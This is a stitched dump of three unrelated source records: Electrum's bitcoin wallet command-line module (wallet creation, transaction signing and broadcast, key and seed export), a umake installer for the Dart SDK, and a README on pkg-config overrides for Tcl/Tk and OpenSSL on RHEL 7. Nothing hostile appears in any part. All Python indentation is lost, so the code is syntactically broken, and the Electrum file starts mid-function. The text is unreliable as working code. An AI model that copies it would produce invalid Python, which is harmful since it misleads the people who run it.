varnames = func.__code__.co_varnames[1:func.__code__.co_argcount]
self.defaults = func.__defaults__
if self.defaults:
n = len(self.defaults)
self.params = list(varnames[:-n])
self.options = list(varnames[-n:])
else:
self.params = list(varnames)
self.options = []
self.defaults = []
def command(s):
def decorator(func):
global known_commands
name = func.__name__
known_commands[name] = Command(func, s)
@wraps(func)
def func_wrapper(*args, **kwargs):
c = known_commands[func.__name__]
wallet = args[0].wallet
password = kwargs.get('password')
if c.requires_wallet and wallet is None:
raise Exception("wallet not loaded. Use 'electrum daemon load_wallet'")
if c.requires_password and password is None and wallet.has_password():
return {'error': 'Password required' }
return func(*args, **kwargs)
return func_wrapper
return decorator
class Commands:
def __init__(self, config: 'SimpleConfig', wallet: Abstract_Wallet,
network: Optional['Network'], callback=None):
self.config = config
self.wallet = wallet
self.network = network
self._callback = callback
def _run(self, method, args, password_getter):
# this wrapper is called from the python console
cmd = known_commands[method]
if cmd.requires_password and self.wallet.has_password():
password = password_getter()
if password is None:
return
else:
password = None
f = getattr(self, method)
if cmd.requires_password:
result = f(*args, **{'password':password})
else:
result = f(*args)
if self._callback:
self._callback()
return result
@command('')
def commands(self):
"""List of commands"""
return ' '.join(sorted(known_commands.keys()))
@command('')
def create(self, passphrase=None, password=None, encrypt_file=True, segwit=False):
"""Create a new wallet.
If you want to be prompted for an argument, type '?' or ':' (concealed)
"""
d = create_new_wallet(path=self.config.get_wallet_path(),
passphrase=passphrase,
password=password,
encrypt_file=encrypt_file,
segwit=segwit)
return {
'seed': d['seed'],
'path': d['wallet'].storage.path,
'msg': d['msg'],
}
@command('')
def restore(self, text, passphrase=None, password=None, encrypt_file=True):
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys.
If you want to be prompted for an argument, type '?' or ':' (concealed)
"""
d = restore_wallet_from_text(text,
path=self.config.get_wallet_path(),
passphrase=passphrase,
password=password,
encrypt_file=encrypt_file,
network=self.network)
return {
'path': d['wallet'].storage.path,
'msg': d['msg'],
}
@command('wp')
def password(self, password=None, new_password=None):
"""Change wallet password. """
if self.wallet.storage.is_encrypted_with_hw_device() and new_password:
raise Exception("Can't change the password of a wallet encrypted with a hw device.")
b = self.wallet.storage.is_encrypted()
self.wallet.update_password(password, new_password, b)
self.wallet.storage.write()
return {'password':self.wallet.has_password()}
@command('w')
def get(self, key):
"""Return item from wallet storage"""
return self.wallet.storage.get(key)
@command('')
def getconfig(self, key):
"""Return a configuration variable. """
return self.config.get(key)
@classmethod
def _setconfig_normalize_value(cls, key, value):
if key not in ('rpcuser', 'rpcpassword'):
value = json_decode(value)
try:
value = ast.literal_eval(value)
except:
pass
return value
@command('')
def setconfig(self, key, value):
"""Set a configuration variable. 'value' may be a string or a Python expression."""
value = self._setconfig_normalize_value(key, value)
self.config.set_key(key, value)
return True
@command('')
def make_seed(self, nbits=132, language=None, segwit=False):
"""Create a seed"""
from .mnemonic import Mnemonic
t = 'segwit' if segwit else 'standard'
s = Mnemonic(language).make_seed(t, nbits)
return s
@command('n')
def getaddresshistory(self, address):
"""Return the transaction history of any address. Note: This is a
walletless server query, results are not checked by SPV.
"""
sh = bitcoin.address_to_scripthash(address)
return self.network.run_from_another_thread(self.network.get_history_for_scripthash(sh))
@command('w')
def listunspent(self):
"""List unspent outputs. Returns the list of unspent transaction
outputs in your wallet."""
l = copy.deepcopy(self.wallet.get_utxos())
for i in l:
v = i["value"]
i["value"] = str(Decimal(v)/COIN) if v is not None else None
return l
@command('n')
def getaddressunspent(self, address):
"""Returns the UTXO list of any address. Note: This
is a walletless server query, results are not checked by SPV.
"""
sh = bitcoin.address_to_scripthash(address)
return self.network.run_from_another_thread(self.network.listunspent_for_scripthash(sh))
@command('')
def serialize(self, jsontx):
"""Create a transaction from json inputs.
Inputs must have a redeemPubkey.
Outputs must be a list of {'address':address, 'value':satoshi_amount}.
"""
keypairs = {}
inputs = jsontx.get('inputs')
outputs = jsontx.get('outputs')
locktime = jsontx.get('lockTime', 0)
for txin in inputs:
if txin.get('output'):
prevout_hash, prevout_n = txin['output'].split(':')
txin['prevout_n'] = int(prevout_n)
txin['prevout_hash'] = prevout_hash
sec = txin.get('privkey')
if sec:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
pubkey = ecc.ECPrivkey(privkey).get_public_key_hex(compressed=compressed)
keypairs[pubkey] = privkey, compressed
txin['type'] = txin_type
txin['x_pubkeys'] = [pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
outputs = [TxOutput(TYPE_ADDRESS, x['address'], int(x['value'])) for x in outputs]
tx = Transaction.from_io(inputs, outputs, locktime=locktime)
tx.sign(keypairs)
return tx.as_dict()
@command('wp')
def signtransaction(self, tx, privkey=None, password=None):
"""Sign a transaction. The wallet keys will be used unless a private key is provided."""
tx = Transaction(tx)
if privkey:
txin_type, privkey2, compressed = bitcoin.deserialize_privkey(privkey)
pubkey_bytes = ecc.ECPrivkey(privkey2).get_public_key_bytes(compressed=compressed)
h160 = bitcoin.hash_160(pubkey_bytes)
x_pubkey = 'fd' + bh2u(b'\x00' + h160)
tx.sign({x_pubkey:(privkey2, compressed)})
else:
self.wallet.sign_transaction(tx, password)
return tx.as_dict()
@command('')
def deserialize(self, tx):
"""Deserialize a serialized transaction"""
tx = Transaction(tx)
return tx.deserialize(force_full_parse=True)
@command('n')
def broadcast(self, tx):
"""Broadcast a transaction to the network. """
tx = Transaction(tx)
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
return tx.txid()
@command('')
def createmultisig(self, num, pubkeys):
"""Create multisig address"""
assert isinstance(pubkeys, list), (type(num), type(pubkeys))
redeem_script = multisig_script(pubkeys, num)
address = bitcoin.hash160_to_p2sh(hash_160(bfh(redeem_script)))
return {'address':address, 'redeemScript':redeem_script}
@command('w')
def freeze(self, address):
"""Freeze address. Freeze the funds at one of your wallet\'s addresses"""
return self.wallet.set_frozen_state_of_addresses([address], True)
@command('w')
def unfreeze(self, address):
"""Unfreeze address. Unfreeze the funds at one of your wallet\'s address"""
return self.wallet.set_frozen_state_of_addresses([address], False)
@command('wp')
def getprivatekeys(self, address, password=None):
"""Get private keys of addresses. You may pass a single wallet address, or a list of wallet addresses."""
if isinstance(address, str):
address = address.strip()
if is_address(address):
return self.wallet.export_private_key(address, password)[0]
domain = address
return [self.wallet.export_private_key(address, password)[0] for address in domain]
@command('w')
def ismine(self, address):
"""Check if address is in wallet. Return true if and only address is in wallet"""
return self.wallet.is_mine(address)
@command('')
def dumpprivkeys(self):
"""Deprecated."""
return "This command is deprecated. Use a pipe instead: 'electrum listaddresses | electrum getprivatekeys - '"
@command('')
def validateaddress(self, address):
"""Check that an address is valid. """
return is_address(address)
@command('w')
def getpubkeys(self, address):
"""Return the public keys for a wallet address. """
return self.wallet.get_public_keys(address)
@command('w')
def getbalance(self):
"""Return the balance of your wallet. """
c, u, x = self.wallet.get_balance()
out = {"confirmed": str(Decimal(c)/COIN)}
if u:
out["unconfirmed"] = str(Decimal(u)/COIN)
if x:
out["unmatured"] = str(Decimal(x)/COIN)
return out
@command('n')
def getaddressbalance(self, address):
"""Return the balance of any address. Note: This is a walletless
server query, results are not checked by SPV.
"""
sh = bitcoin.address_to_scripthash(address)
out = self.network.run_from_another_thread(self.network.get_balance_for_scripthash(sh))
out["confirmed"] = str(Decimal(out["confirmed"])/COIN)
out["unconfirmed"] = str(Decimal(out["unconfirmed"])/COIN)
return out
@command('n')
def getmerkle(self, txid, height):
"""Get Merkle branch of a transaction included in a block. Electrum
uses this to verify transactions (Simple Payment Verification)."""
return self.network.run_from_another_thread(self.network.get_merkle_for_transaction(txid, int(height)))
@command('n')
def getservers(self):
"""Return the list of available servers"""
return self.network.get_servers()
@command('')
def version(self):
"""Return the version of Electrum."""
from .version import ELECTRUM_VERSION
return ELECTRUM_VERSION
@command('w')
def getmpk(self):
"""Get master public key. Return your wallet\'s master public key"""
return self.wallet.get_master_public_key()
@command('wp')
def getmasterprivate(self, password=None):
"""Get master private key. Return your wallet\'s master private key"""
return str(self.wallet.keystore.get_master_private_key(password))
@command('')
def convert_xkey(self, xkey, xtype):
"""Convert xtype of a master key. e.g. xpub -> ypub"""
try:
node = BIP32Node.from_xkey(xkey)
except:
raise Exception('xkey should be a master public/private key')
return node._replace(xtype=xtype).to_xkey()
@command('wp')
def getseed(self, password=None):
"""Get seed phrase. Print the generation seed of your wallet."""
s = self.wallet.get_seed(password)
return s
@command('wp')
def importprivkey(self, privkey, password=None):
"""Import a private key."""
if not self.wallet.can_import_privkey():
return "Error: This type of wallet cannot import private keys. Try to create a new wallet with that key."
try:
addr = self.wallet.import_private_key(privkey, password)
out = "Keypair imported: " + addr
except Exception as e:
out = "Error: " + repr(e)
return out
def _resolver(self, x):
if x is None:
return None
out = self.wallet.contacts.resolve(x)
if out.get('type') == 'openalias' and self.nocheck is False and out.get('validated') is False:
raise Exception('cannot verify alias', x)
return out['address']
@command('n')
def sweep(self, privkey, destination, fee=None, nocheck=False, imax=100):
"""Sweep private keys. Returns a transaction that spends UTXOs from
privkey to a destination address. The transaction is not
broadcasted."""
from .wallet import sweep
tx_fee = satoshis(fee)
privkeys = privkey.split()
self.nocheck = nocheck
#dest = self._resolver(destination)
tx = sweep(privkeys, self.network, self.config, destination, tx_fee, imax)
return tx.as_dict() if tx else None
@command('wp')
def signmessage(self, address, message, password=None):
"""Sign a message with a key. Use quotes if your message contains
whitespaces"""
sig = self.wallet.sign_message(address, message, password)
return base64.b64encode(sig).decode('ascii')
@command('')
def verifymessage(self, address, signature, message):
"""Verify a signature."""
sig = base64.b64decode(signature)
message = util.to_bytes(message)
return ecc.verify_message_with_address(address, sig, message)
def _mktx(self, outputs, fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime=None):
self.nocheck = nocheck
change_addr = self._resolver(change_addr)
domain = None if domain is None else map(self._resolver, domain)
final_outputs = []
for address, amount in outputs:
address = self._resolver(address)
amount = satoshis(amount)
final_outputs.append(TxOutput(TYPE_ADDRESS, address, amount))
coins = self.wallet.get_spendable_coins(domain, self.config)
tx = self.wallet.make_unsigned_transaction(coins, final_outputs, self.config, fee, change_addr)
if locktime != None:
tx.locktime = locktime
if rbf is None:
rbf = self.config.get('use_rbf', True)
if rbf:
tx.set_rbf(True)
if not unsigned:
self.wallet.sign_transaction(tx, password)
return tx
@command('wp')
def payto(self, destination, amount, fee=None, from_addr=None, change_addr=None, nocheck=False, unsigned=False, rbf=None, password=None, locktime=None):
"""Create a transaction. """
tx_fee = satoshis(fee)
domain = from_addr.split(',') if from_addr else None
tx = self._mktx([(destination, amount)], tx_fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime)
return tx.as_dict()
@command('wp')
def paytomany(self, outputs, fee=None, from_addr=None, change_addr=None, nocheck=False, unsigned=False, rbf=None, password=None, locktime=None):
"""Create a multi-output transaction. """
tx_fee = satoshis(fee)
domain = from_addr.split(',') if from_addr else None
tx = self._mktx(outputs, tx_fee, change_addr, domain, nocheck, unsigned, rbf, password, locktime)
return tx.as_dict()
@command('w')
def history(self, year=None, show_addresses=False, show_fiat=False, show_fees=False,
from_height=None, to_height=None):
"""Wallet history. Returns the transaction history of your wallet."""
kwargs = {
'show_addresses': show_addresses,
'show_fees': show_fees,
'from_height': from_height,
'to_height': to_height,
}
if year:
import time
start_date = datetime.datetime(year, 1, 1)
end_date = datetime.datetime(year+1, 1, 1)
kwargs['from_timestamp'] = time.mktime(start_date.timetuple())
kwargs['to_timestamp'] = time.mktime(end_date.timetuple())
if show_fiat:
from .exchange_rate import FxThread
fx = FxThread(self.config, None)
kwargs['fx'] = fx
return json_encode(self.wallet.get_full_history(**kwargs))
@command('w')
def setlabel(self, key, label):
"""Assign a label to an item. Item may be a bitcoin address or a
transaction ID"""
self.wallet.set_label(key, label)
@command('w')
def listcontacts(self):
"""Show your list of contacts"""
return self.wallet.contacts
@command('w')
def getalias(self, key):
"""Retrieve alias. Lookup in your list of contacts, and for an OpenAlias DNS record."""
return self.wallet.contacts.resolve(key)
@command('w')
def searchcontacts(self, query):
"""Search through contacts, return matching entries. """
results = {}
for key, value in self.wallet.contacts.items():
if query.lower() in key.lower():
results[key] = value
return results
@command('w')
def listaddresses(self, receiving=False, change=False, labels=False, frozen=False, unused=False, funded=False, balance=False):
"""List wallet addresses. Returns the list of all addresses in your wallet. Use optional arguments to filter the results."""
out = []
for addr in self.wallet.get_addresses():
if frozen and not self.wallet.is_frozen_address(addr):
continue
if receiving and self.wallet.is_change(addr):
continue
if change and not self.wallet.is_change(addr):
continue
if unused and self.wallet.is_used(addr):
continue
if funded and self.wallet.is_empty(addr):
continue
item = addr
if labels or balance:
item = (item,)
if balance:
item += (format_satoshis(sum(self.wallet.get_addr_balance(addr))),)
if labels:
item += (repr(self.wallet.labels.get(addr, '')),)
out.append(item)
return out
@command('n')
def gettransaction(self, txid):
"""Retrieve a transaction. """
tx = None
if self.wallet:
tx = self.wallet.db.get_transaction(txid)
if tx is None:
raw = self.network.run_from_another_thread(self.network.get_transaction(txid))
if raw:
tx = Transaction(raw)
else:
raise Exception("Unknown transaction")
return tx.as_dict()
@command('')
def encrypt(self, pubkey, message) -> str:
"""Encrypt a message with a public key. Use quotes if the message contains whitespaces."""
if not is_hex_str(pubkey):
raise Exception(f"pubkey must be a hex string instead of {repr(pubkey)}")
try:
message = to_bytes(message)
except TypeError:
raise Exception(f"message must be a string-like object instead of {repr(message)}")
public_key = ecc.ECPubkey(bfh(pubkey))
encrypted = public_key.encrypt_message(message)
return encrypted.decode('utf-8')
@command('wp')
def decrypt(self, pubkey, encrypted, password=None) -> str:
"""Decrypt a message encrypted with a public key."""
if not is_hex_str(pubkey):
raise Exception(f"pubkey must be a hex string instead of {repr(pubkey)}")
if not isinstance(encrypted, (str, bytes, bytearray)):
raise Exception(f"encrypted must be a string-like object instead of {repr(encrypted)}")
decrypted = self.wallet.decrypt_message(pubkey, encrypted, password)
return decrypted.decode('utf-8')
def _format_request(self, out):
pr_str = {
PR_UNKNOWN: 'Unknown',
PR_UNPAID: 'Pending',
PR_PAID: 'Paid',
PR_EXPIRED: 'Expired',
}
out['amount (BTC)'] = format_satoshis(out.get('amount'))
out['status'] = pr_str[out.get('status', PR_UNKNOWN)]
return out
@command('w')
def getrequest(self, key):
"""Return a payment request"""
r = self.wallet.get_payment_request(key, self.config)
if not r:
raise Exception("Request not found")
return self._format_request(r)
#@command('w')
#def ackrequest(self, serialized):
# """<Not implemented>"""
# pass
@command('w')
def listrequests(self, pending=False, expired=False, paid=False):
"""List the payment requests you made."""
out = self.wallet.get_sorted_requests(self.config)
if pending:
f = PR_UNPAID
elif expired:
f = PR_EXPIRED
elif paid:
f = PR_PAID
else:
f = None
if f is not None:
out = list(filter(lambda x: x.get('status')==f, out))
return list(map(self._format_request, out))
@command('w')
def createnewaddress(self):
"""Create a new receiving address, beyond the gap limit of the wallet"""
return self.wallet.create_new_address(False)
@command('w')
def getunusedaddress(self):
"""Returns the first unused address of the wallet, or None if all addresses are used.
An address is considered as used if it has received a transaction, or if it is used in a payment request."""
return self.wallet.get_unused_address()
@command('w')
def addrequest(self, amount, memo='', expiration=None, force=False):
"""Create a payment request, using the first unused address of the wallet.
The address will be considered as used after this operation.
If no payment is received, the address will be considered as unused if the payment request is deleted from the wallet."""
addr = self.wallet.get_unused_address()
if addr is None:
if force:
addr = self.wallet.create_new_address(False)
else:
return False
amount = satoshis(amount)
expiration = int(expiration) if expiration else None
req = self.wallet.make_payment_request(addr, amount, memo, expiration)
self.wallet.add_payment_request(req, self.config)
out = self.wallet.get_payment_request(addr, self.config)
return self._format_request(out)
@command('w')
def addtransaction(self, tx):
""" Add a transaction to the wallet history """
tx = Transaction(tx)
if not self.wallet.add_transaction(tx.txid(), tx):
return False
self.wallet.storage.write()
return tx.txid()
@command('wp')
def signrequest(self, address, password=None):
"Sign payment request with an OpenAlias"
alias = self.config.get('alias')
if not alias:
raise Exception('No alias in your configuration')
alias_addr = self.wallet.contacts.resolve(alias)['address']
self.wallet.sign_payment_request(address, alias, alias_addr, password)
@command('w')
def rmrequest(self, address):
"""Remove a payment request"""
return self.wallet.remove_payment_request(address, self.config)
@command('w')
def clearrequests(self):
"""Remove all payment requests"""
for k in list(self.wallet.receive_requests.keys()):
self.wallet.remove_payment_request(k, self.config)
@command('n')
def notify(self, address: str, URL: str):
"""Watch an address. Every time the address changes, a http POST is sent to the URL."""
if not hasattr(self, "_notifier"):
self._notifier = Notifier(self.network)
self.network.run_from_another_thread(self._notifier.start_watching_queue.put((address, URL)))
return True
@command('wn')
def is_synchronized(self):
""" return wallet synchronization status """
return self.wallet.is_up_to_date()
@command('n')
def getfeerate(self, fee_method=None, fee_level=None):
"""Return current suggested fee rate (in sat/kvByte), according to config
settings or supplied parameters.
"""
if fee_method is None:
dyn, mempool = None, None
elif fee_method.lower() == 'static':
dyn, mempool = False, False
elif fee_method.lower() == 'eta':
dyn, mempool = True, False
elif fee_method.lower() == 'mempool':
dyn, mempool = True, True
else:
raise Exception('Invalid fee estimation method: {}'.format(fee_method))
if fee_level is not None:
fee_level = Decimal(fee_level)
return self.config.fee_per_kb(dyn=dyn, mempool=mempool, fee_level=fee_level)
@command('w')
def removelocaltx(self, txid):
"""Remove a 'local' transaction from the wallet, and its dependent
transactions.
"""
if not is_hash256_str(txid):
raise Exception(f"{repr(txid)} is not a txid")
height = self.wallet.get_tx_height(txid).height
to_delete = {txid}
if height != TX_HEIGHT_LOCAL:
raise Exception(f'Only local transactions can be removed. '
f'This tx has height: {height} != {TX_HEIGHT_LOCAL}')
to_delete |= self.wallet.get_depending_transactions(txid)
for tx_hash in to_delete:
self.wallet.remove_transaction(tx_hash)
self.wallet.storage.write()
@command('wn')
def get_tx_status(self, txid):
"""Returns some information regarding the tx. For now, only confirmations.
The transaction must be related to the wallet.
"""
if not is_hash256_str(txid):
raise Exception(f"{repr(txid)} is not a txid")
if not self.wallet.db.get_transaction(txid):
raise Exception("Transaction not in wallet.")
return {
"confirmations": self.wallet.get_tx_height(txid).conf,
}
@command('')
def help(self):
# for the python console
return sorted(known_commands.keys())
def eval_bool(x: str) -> bool:
if x == 'false': return False
if x == 'true': return True
try:
return bool(ast.literal_eval(x))
except:
return bool(x)
param_descriptions = {
'privkey': 'Private key. Type \'?\' to get a prompt.',
'destination': 'Bitcoin address, contact or alias',
'address': 'Bitcoin address',
'seed': 'Seed phrase',
'txid': 'Transaction ID',
'pos': 'Position',
'height': 'Block height',
'tx': 'Serialized transaction (hexadecimal)',
'key': 'Variable name',
'pubkey': 'Public key',
'message': 'Clear text message. Use quotes if it contains spaces.',
'encrypted': 'Encrypted message',
'amount': 'Amount to be sent (in BTC). Type \'!\' to send the maximum available.',
'requested_amount': 'Requested amount (in BTC).',
'outputs': 'list of ["address", amount]',
'redeem_script': 'redeem script (hexadecimal)',
}
command_options = {
'password': ("-W", "Password"),
'new_password':(None, "New Password"),
'encrypt_file':(None, "Whether the file on disk should be encrypted with the provided password"),
'receiving': (None, "Show only receiving addresses"),
'change': (None, "Show only change addresses"),
'frozen': (None, "Show only frozen addresses"),
'unused': (None, "Show only unused addresses"),
'funded': (None, "Show only funded addresses"),
'balance': ("-b", "Show the balances of listed addresses"),
'labels': ("-l", "Show the labels of listed addresses"),
'nocheck': (None, "Do not verify aliases"),
'imax': (None, "Maximum number of inputs"),
'fee': ("-f", "Transaction fee (in BTC)"),
'from_addr': ("-F", "Source address (must be a wallet address; use sweep to spend from non-wallet address)."),
'change_addr': ("-c", "Change address. Default is a spare address, or the source address if it's not in the wallet"),
'nbits': (None, "Number of bits of entropy"),
'segwit': (None, "Create segwit seed"),
'language': ("-L", "Default language for wordlist"),
'passphrase': (None, "Seed extension"),
'privkey': (None, "Private key. Set to '?' to get a prompt."),
'unsigned': ("-u", "Do not sign transaction"),
'rbf': (None, "Replace-by-fee transaction"),
'locktime': (None, "Set locktime block number"),
'domain': ("-D", "List of addresses"),
'memo': ("-m", "Description of the request"),
'expiration': (None, "Time in seconds"),
'timeout': (None, "Timeout in seconds"),
'force': (None, "Create new address beyond gap limit, if no more addresses are available."),
'pending': (None, "Show only pending requests."),
'expired': (None, "Show only expired requests."),
'paid': (None, "Show only paid requests."),
'show_addresses': (None, "Show input and output addresses"),
'show_fiat': (None, "Show fiat value of transactions"),
'show_fees': (None, "Show miner fees paid by transactions"),
'year': (None, "Show history for a given year"),
'fee_method': (None, "Fee estimation method to use"),
'fee_level': (None, "Float between 0.0 and 1.0, representing fee slider position"),
'from_height': (None, "Only show transactions that confirmed after given block height"),
'to_height': (None, "Only show transactions that confirmed before given block height"),
}
# don't use floats because of rounding errors
from .transaction import tx_from_str
json_loads = lambda x: json.loads(x, parse_float=lambda x: str(Decimal(x)))
arg_types = {
'num': int,
'nbits': int,
'imax': int,
'year': int,
'from_height': int,
'to_height': int,
'tx': tx_from_str,
'pubkeys': json_loads,
'jsontx': json_loads,
'inputs': json_loads,
'outputs': json_loads,
'fee': lambda x: str(Decimal(x)) if x is not None else None,
'amount': lambda x: str(Decimal(x)) if x != '!' else '!',
'locktime': int,
'fee_method': str,
'fee_level': json_loads,
'encrypt_file': eval_bool,
}
config_variables = {
'addrequest': {
'requests_dir': 'directory where a bip70 file will be written.',
'ssl_privkey': 'Path to your SSL private key, needed to sign the request.',
'ssl_chain': 'Chain of SSL certificates, needed for signed requests. Put your certificate at the top and the root CA at the end',
'url_rewrite': 'Parameters passed to str.replace(), in order to create the r= part of bitcoin: URIs. Example: \"(\'file:///var/www/\',\'https://electrum.org/\')\"',
},
'listrequests':{
'url_rewrite': 'Parameters passed to str.replace(), in order to create the r= part of bitcoin: URIs. Example: \"(\'file:///var/www/\',\'https://electrum.org/\')\"',
}
}
def set_default_subparser(self, name, args=None):
"""see http://stackoverflow.com/questions/5176691/argparse-how-to-specify-a-default-subcommand"""
subparser_found = False
for arg in sys.argv[1:]:
if arg in ['-h', '--help']: # global help if no subparser
break
else:
for x in self._subparsers._actions:
if not isinstance(x, argparse._SubParsersAction):
continue
for sp_name in x._name_parser_map.keys():
if sp_name in sys.argv[1:]:
subparser_found = True
if not subparser_found:
# insert default in first position, this implies no
# global options without a sub_parsers specified
if args is None:
sys.argv.insert(1, name)
else:
args.insert(0, name)
argparse.ArgumentParser.set_default_subparser = set_default_subparser
# workaround https://bugs.python.org/issue23058
# see https://github.com/nickstenning/honcho/pull/121
def subparser_call(self, parser, namespace, values, option_string=None):
from argparse import ArgumentError, SUPPRESS, _UNRECOGNIZED_ARGS_ATTR
parser_name = values[0]
arg_strings = values[1:]
# set the parser name if requested
if self.dest is not SUPPRESS:
setattr(namespace, self.dest, parser_name)
# select the parser
try:
parser = self._name_parser_map[parser_name]
except KeyError:
tup = parser_name, ', '.join(self._name_parser_map)
msg = _('unknown parser {!r} (choices: {})').format(*tup)
raise ArgumentError(self, msg)
# parse all the remaining options into the namespace
# store any unrecognized options on the object, so that the top
# level parser can decide what to do with them
namespace, arg_strings = parser.parse_known_args(arg_strings, namespace)
if arg_strings:
vars(namespace).setdefault(_UNRECOGNIZED_ARGS_ATTR, [])
getattr(namespace, _UNRECOGNIZED_ARGS_ATTR).extend(arg_strings)
argparse._SubParsersAction.__call__ = subparser_call
def add_network_options(parser):
parser.add_argument("-1", "--oneserver", action="store_true", dest="oneserver", default=None, help="connect to one server only")
parser.add_argument("-s", "--server", dest="server", default=None, help="set server host:port:protocol, where protocol is either t (tcp) or s (ssl)")
parser.add_argument("-p", "--proxy", dest="proxy", default=None, help="set proxy [type:]host[:port], where type is socks4,socks5 or http")
parser.add_argument("--noonion", action="store_true", dest="noonion", default=None, help="do not try to connect to onion servers")
parser.add_argument("--skipmerklecheck", action="store_true", dest="skipmerklecheck", default=False, help="Tolerate invalid merkle proofs from server")
def add_global_options(parser):
group = parser.add_argument_group('global options')
group.add_argument("-v", dest="verbosity", help="Set verbosity (log levels)", default='')
group.add_argument("-V", dest="verbosity_shortcuts", help="Set verbosity (shortcut-filter list)", default='')
group.add_argument("-D", "--dir", dest="electrum_path", help="electrum directory")
group.add_argument("-P", "--portable", action="store_true", dest="portable", default=False, help="Use local 'electrum_data' directory")
group.add_argument("-w", "--wallet", dest="wallet_path", help="wallet path")
group.add_argument("--testnet", action="store_true", dest="testnet", default=False, help="Use Testnet")
group.add_argument("--regtest", action="store_true", dest="regtest", default=False, help="Use Regtest")
group.add_argument("--simnet", action="store_true", dest="simnet", default=False, help="Use Simnet")
def get_parser():
# create main parser
parser = argparse.ArgumentParser(
epilog="Run 'electrum help <command>' to see the help for a command")
add_global_options(parser)
subparsers = parser.add_subparsers(dest='cmd', metavar='<command>')
# gui
parser_gui = subparsers.add_parser('gui', description="Run Electrum's Graphical User Interface.", help="Run GUI (default)")
parser_gui.add_argument("url", nargs='?', default=None, help="bitcoin URI (or bip70 file)")
parser_gui.add_argument("-g", "--gui", dest="gui", help="select graphical user interface", choices=['qt', 'kivy', 'text', 'stdio'])
parser_gui.add_argument("-o", "--offline", action="store_true", dest="offline", default=False, help="Run offline")
parser_gui.add_argument("-m", action="store_true", dest="hide_gui", default=False, help="hide GUI on startup")
parser_gui.add_argument("-L", "--lang", dest="language", default=None, help="default language used in GUI")
parser_gui.add_argument("--daemon", action="store_true", dest="daemon", default=False, help="keep daemon running after GUI is closed")
add_network_options(parser_gui)
add_global_options(parser_gui)
# daemon
parser_daemon = subparsers.add_parser('daemon', help="Run Daemon")
parser_daemon.add_argument("subcommand", choices=['start', 'status', 'stop', 'load_wallet', 'close_wallet'], nargs='?')
#parser_daemon.set_defaults(func=run_daemon)
add_network_options(parser_daemon)
add_global_options(parser_daemon)
# commands
for cmdname in sorted(known_commands.keys()):
cmd = known_commands[cmdname]
p = subparsers.add_parser(cmdname, help=cmd.help, description=cmd.description)
add_global_options(p)
for optname, default in zip(cmd.options, cmd.defaults):
a, help = command_options[optname]
b = '--' + optname
action = "store_true" if default is False else 'store'
args = (a, b) if a else (b,)
if action == 'store':
_type = arg_types.get(optname, str)
p.add_argument(*args, dest=optname, action=action, default=default, help=help, type=_type)
else:
p.add_argument(*args, dest=optname, action=action, default=default, help=help)
for param in cmd.params:
h = param_descriptions.get(param, '')
_type = arg_types.get(param, str)
p.add_argument(param, help=h, type=_type)
cvh = config_variables.get(cmdname)
if cvh:
group = p.add_argument_group('configuration variables', '(set with setconfig/getconfig)')
for k, v in cvh.items():
group.add_argument(k, nargs='?', help=v)
# 'gui' is the default command
parser.set_default_subparser('gui')
return parser | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Canonical
#
# Authors:
# Didier Roche
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; version 3.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""Dartlang module"""
from contextlib import suppress
from gettext import gettext as _
import logging
import os
import platform
import re
import umake.frameworks.baseinstaller
from umake.interactions import DisplayMessage
from umake.network.download_center import DownloadItem
from umake.tools import add_env_to_user, MainLoop
from umake.ui import UI
logger = logging.getLogger(__name__)
_supported_archs = ['i386', 'amd64']
class DartCategory(umake.frameworks.BaseCategory):
def __init__(self):
super().__init__(name="Dart", description=_("Dartlang Development Environment"), logo_path=None)
class DartLangEditorRemoval(umake.frameworks.baseinstaller.BaseInstaller):
def __init__(self, category):
super().__init__(name="Dart Editor", description=_("Dart SDK with editor (not supported upstream anyymore)"),
download_page=None, category=category, only_on_archs=_supported_archs, only_for_removal=True)
class DartLang(umake.frameworks.baseinstaller.BaseInstaller):
def __init__(self, category):
super().__init__(name="Dart SDK", description=_("Dart SDK (default)"), is_category_default=True,
category=category, only_on_archs=_supported_archs,
download_page="https://api.dartlang.org",
dir_to_decompress_in_tarball="dart-sdk",
required_files_path=[os.path.join("bin", "dart")])
@MainLoop.in_mainloop_thread
def get_metadata_and_check_license(self, result):
"""Get latest version and append files to download"""
logger.debug("Set download metadata")
error_msg = result[self.download_page].error
if error_msg:
logger.error("An error occurred while downloading {}: {}".format(self.download_page, error_msg))
UI.return_main_screen(status_code=1)
version = ''
version_re = r'Dart SDK ([\d\.]+)'
for line in result[self.download_page].buffer:
p = re.search(version_re, line.decode())
with suppress(AttributeError):
version = p.group(1)
break
else:
logger.error("Download page changed its syntax or is not parsable")
UI.return_main_screen(status_code=1)
tag_machine = 'x64'
if platform.machine() == 'i686':
tag_machine = 'ia32'
url = "https://storage.googleapis.com/dart-archive/channels/stable/release/{}/sdk/dartsdk-linux-{}-release.zip"\
.format(version, tag_machine)
logger.debug("Found download link for {}".format(url))
self.download_requests.append(DownloadItem(url, None))
self.start_download_and_install()
def post_install(self):
"""Add go necessary env variables"""
add_env_to_user(self.name, {"PATH": {"value": os.path.join(self.install_path, "bin")}})
UI.delayed_display(DisplayMessage(_("You need to restart your current shell session for your {} installation "
"to work properly").format(self.name))) | unknown | codeparrot/codeparrot-clean | ||
# pkg-config overrides for RHEL 7 and CentOS 7
RHEL 7 and CentOS 7 do not provide pkg-config `.pc` files for Tcl/Tk. The
OpenSSL 1.1.1 pkg-config file is named `openssl11.pc` and not picked up
by Python's `configure` script.
To build Python with system Tcl/Tk libs and OpenSSL 1.1 package, first
install the developer packages and the `pkgconfig` package with `pkg-config`
command.
```shell
sudo yum install pkgconfig 'tcl-devel >= 8.5.12' 'tk-devel >= 8.5.12' openssl11-devel
```
